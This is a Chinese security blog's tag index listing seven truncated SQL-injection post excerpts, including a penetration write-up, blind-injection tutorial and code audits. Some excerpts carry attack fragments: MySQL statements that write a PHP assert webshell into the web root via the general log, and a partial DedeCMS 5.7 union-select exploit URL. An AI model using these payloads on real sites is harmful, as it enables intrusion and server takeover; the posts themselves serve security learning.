DYBOY's Blog

标签关键词

关于 SQL注入 的文章共有7条

网络安全
[渗透实战]某铸造设备公司官网经典思路

这个网站是微信漏洞挖掘公开课群里的一位群友发出来的,空闲时看了看,不是很难,但是我觉得有一定的参考价值,算是比较经典的一种吧!*声明:只做技术分享,后续已去除shell的文件!请相关公司做好及时的修复!看到这篇文章的大佬,也别去折腾了,思路本文已经分享,自重微信群友发来这样的消息:[图片已删除]从这样的消息看出来,已经知道editor编辑器,可以确定发问者已经进入网站的后台...

网络安全
SQL盲注学习到EXP编写

今天整理一下SQL盲注,之前说好了整理分享的,这篇文章一直在草稿箱躺着,今天整理补充好了,感兴趣的朋友收藏啊!最近忙着写主题模版,写插件,帮朋友做项目安全测试,还有自己学校的期末考试,但是越是期末,与紧张,就越是感觉非常刺激~对于SQL注入还不理解的朋友可以参看之前的文章《SQL注入基础》,本文章主要讲SQL盲注。0x00盲注简介:顾名思义,像盲人一样注入(什么鬼解释…),通...

网络安全
SQL注入基础-基于Sqli-lab平台实战

简介:SQL注入是一个常见的漏洞,在所有的安全防护统计数据儿结果中显示,SQL注入几乎占据网络攻击问题的60%左右,由此可见SQL注入漏洞是一种常见的WEB漏洞,了解SQL注入对于网络安全工作者或安全爱好者来说,是非常有必要,本文章主要通过sqli平台来具体阐述SQL注入漏洞产生的原因和利用方法。0x00SQL注入漏洞简介有关SQL注入的各种定义阐述已经很多,大家可自行使用搜索引擎搜索即...

网络安全
[笔记]Mysql通过日志拿shell

Mysql通过日志拿shellemmm~有点舒服0x00利用条件root网站物理路径文件位置未被限制0x01SQL语句setglobalgeneral_log=on;setglobalgeneral_log_file='C:/phpStudy/WWW/dyboy.php';select'<?php@assert($_POST...

网络安全
[代码审计]XYCMS留言板V1.7

代码审计方面小东还不算很深入,所以去站长之家找了一个低版本号的XYCMS留言板程序来审计一下,往往这种低版本的适合入门(适合我)0x00XYCMS留言板简介程序下载地址:http://down.chinaz.com/soft/37797.htm简介:XYCMS留言板是以php+MySQL进行开发的php留言板源码,软件为普通的留言板可广泛应用于企业网站等需要留言板的网站中进行使用。...

网络安全
DedeCMS 20140201 之前的5.7通杀SQL注入漏洞

虽然漏洞有点久远了,但有的时候还能遇见…虽然漏洞有点久远了,但有的时候还能遇见…0x00EXPhttp://www.dyboy.cn/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\'ormid=@`\'`/*!50000union*//*!50000select*/1,2,3,(selectCONC...

网络安全
[代码审计]Emlog友情链接插件存在SQL注入漏洞

这其实不能算是emlog系统的漏洞,这问题主要是出现在开发者身上。由于作者在写代码的时候没有注意到过滤参数,因此而引发了SQL注入漏洞,望大家有安装过或类似的插件,请及时更新,本文章最后会提供修复版的插件!0x01Emlog友情链接自助插件这款插件主要是为了减轻站长审核友情链接的压力,通过申请者自己填写表单的方式提交申请,后端检查对方网站是否添加本站的链接从,如果存在,则向数据库中添...

TOP
Powered by Emlog | Theme:Monkey by DYBOY
渝ICP备16008772号
sitemap